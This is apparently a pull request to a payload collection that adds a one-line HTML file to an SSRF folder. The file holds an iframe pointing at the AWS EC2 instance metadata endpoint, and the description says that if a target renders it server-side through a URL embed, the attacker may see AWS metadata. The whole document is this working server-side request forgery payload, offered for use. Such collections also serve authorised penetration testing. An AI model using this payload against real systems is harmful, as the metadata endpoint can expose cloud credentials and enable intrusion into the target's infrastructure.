### PR TITLE
ec2 meta data payload using iframe

### DIFF
--- a/ssrf/ssrf_aws_ec2_meta_data.html
+++ b/ssrf/ssrf_aws_ec2_meta_data.html
@@ -1,0 +1,1 @@
+<iframe src="http://169.254.169.254/latest/meta-data/"> 


### PR DESCRIPTION
we can use this in url embed if the payload executes in contest of target then we can possibly see aws meta data